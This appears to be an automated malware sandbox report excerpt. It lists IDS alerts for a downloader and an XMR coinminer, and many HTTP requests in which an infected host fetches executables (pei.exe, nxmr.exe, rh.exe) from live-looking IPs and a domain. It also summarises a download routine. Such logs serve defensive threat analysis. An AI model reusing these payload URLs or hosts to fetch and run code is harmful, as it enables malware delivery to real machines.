                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50061 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50036 -> 91.202.233.141:80
                          Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.11:50043 -> 185.215.113.66:80
                          Source: Network trafficSuricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.11:50039 -> 185.215.113.66:5152
                          Source: global trafficHTTP traffic detected: GET /pei.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.215.113.66Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /newtpp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: twizt.net
                          Source: global trafficHTTP traffic detected: GET /peinstall.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: twizt.net
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /rh.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: twizt.net
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /nxmr.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: 185.215.113.84
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /IBSTSWSONL HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: unknownTCP traffic detected without corresponding DNS query: 109.68.122.14
                          Source: unknownTCP traffic detected without corresponding DNS query: 109.68.122.14
                          Source: unknownTCP traffic detected without corresponding DNS query: 109.68.122.14
                          Source: unknownTCP traffic detected without corresponding DNS query: 109.68.122.14
                          Source: unknownTCP traffic detected without corresponding DNS query: 109.68.122.14
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                          Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.84
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: unknownTCP traffic detected without corresponding DNS query: 92.255.85.66
                          Source: C:\Users\user\AppData\Local\Temp\34D7.exeCode function: 3_2_00251100 GetTickCount,srand,ExpandEnvironmentStringsW,rand,rand,wsprintfW,wsprintfW,InternetOpenW,InternetOpenUrlW,CreateFileW,InternetReadFile,InternetReadFile,WriteFile,WriteFile,InternetReadFile,CloseHandle,wsprintfW,DeleteFileW,CloseHandle,wsprintfW,InternetCloseHandle,InternetCloseHandle,Sleep,Sleep,rand,Sleep,rand,rand,wsprintfW,URLDownloadToFileW,wsprintfW,DeleteFileW,3_2_00251100
                          Source: global trafficHTTP traffic detected: GET /pei.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 185.215.113.66Connection: Keep-Alive
                          Source: global trafficHTTP traffic detected: GET /newtpp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: twizt.net
                          Source: global trafficHTTP traffic detected: GET /peinstall.php HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: twizt.net
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /rh.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36Host: twizt.net
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /nxmr.exe HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36Host: 185.215.113.84
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /IBSTSWSONL HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /json.gp?ip= HTTP/1.1User-Agent: MSIEHost: www.geoplugin.netCache-Control: no-cache
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /4 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /5 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 91.202.233.141
                          Source: global trafficHTTP traffic detected: GET /1 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
                          Source: global trafficHTTP traffic detected: GET /2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36Host: 185.215.113.66
